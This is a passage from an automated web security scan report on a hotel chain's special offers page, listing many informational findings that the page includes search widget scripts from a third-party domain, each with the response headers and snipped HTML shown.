Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232063577073750"></script>
...[SNIP]...

5.63. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232064259730000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:20:25 GMT
Content-Length: 63370

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232064259730000"></script>
...[SNIP]...

5.64. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232060973792500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:14:57 GMT
Content-Length: 289631

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232060973792500"></script>
...[SNIP]...

5.65. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232069567698750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:29:16 GMT
Content-Length: 63396

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232069567698750"></script>
...[SNIP]...

5.66. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232063691917500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:19:28 GMT
Content-Length: 63397

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232063691917500"></script>
...[SNIP]...

5.67. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232068035980000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:26:43 GMT
Content-Length: 63416

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232068035980000"></script>
...[SNIP]...

5.68. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232066079417500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:23:27 GMT
Content-Length: 63404

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232066079417500"></script>
...[SNIP]...

5.69. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232098590511250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:17:38 GMT
Content-Length: 63460

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232098590511250"></script>
...[SNIP]...

5.70. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232099274261250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:18:47 GMT
Content-Length: 63450

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232099274261250"></script>
...[SNIP]...

5.71. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067878636250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:26:27 GMT
Content-Length: 63409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067878636250"></script>
...[SNIP]...

5.72. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067917073750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:26:30 GMT
Content-Length: 63431

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067917073750"></script>
...[SNIP]...

5.73. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067023167500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:25:01 GMT
Content-Length: 63416

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067023167500"></script>
...[SNIP]...

5.74. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067999417500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:26:39 GMT
Content-Length: 63447

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067999417500"></script>
...[SNIP]...

5.75. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232070043323750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:30:03 GMT
Content-Length: 63458

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232070043323750"></script>
...[SNIP]...

5.76. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232061184730000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:15:18 GMT
Content-Length: 207205

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232061184730000"></script>
...[SNIP]...

5.77. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232069198323750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:28:39 GMT
Content-Length: 63433

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232069198323750"></script>
...[SNIP]...

5.78. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232065675511250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:22:47 GMT
Content-Length: 63404

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232065675511250"></script>
...[SNIP]...

5.79. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232066382230000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:23:57 GMT
Content-Length: 63416

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232066382230000"></script>
...[SNIP]...

5.80. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232061027386250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:15:02 GMT
Content-Length: 207176

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232061027386250"></script>
...[SNIP]...

5.81. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232066681917500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:24:27 GMT
Content-Length: 63442

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232066681917500"></script>
...[SNIP]...

5.82. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232099710511250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:19:30 GMT
Content-Length: 63440

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232099710511250"></script>
...[SNIP]...

5.83. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232069456292500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:29:05 GMT
Content-Length: 63396

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232069456292500"></script>
...[SNIP]...

5.84. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067290355000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:25:29 GMT
Content-Length: 63355

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232067290355000"></script>
...[SNIP]...

5.85. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232064457698750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 01:20:45 GMT
Content-Length: 63360

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top" bgcolor="#803930" style="height:302px;"><script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232064457698750"></script>
...[SNIP]...

5.86. http://www.sterlinghotels.com/sterling/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/sterling/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=WR&time=634232100125042500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:20:11 GMT
Content-Length: 63441

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sterling Hotels - Special offers
</title><link href="../css/main.css
...[SNIP]...
</script>
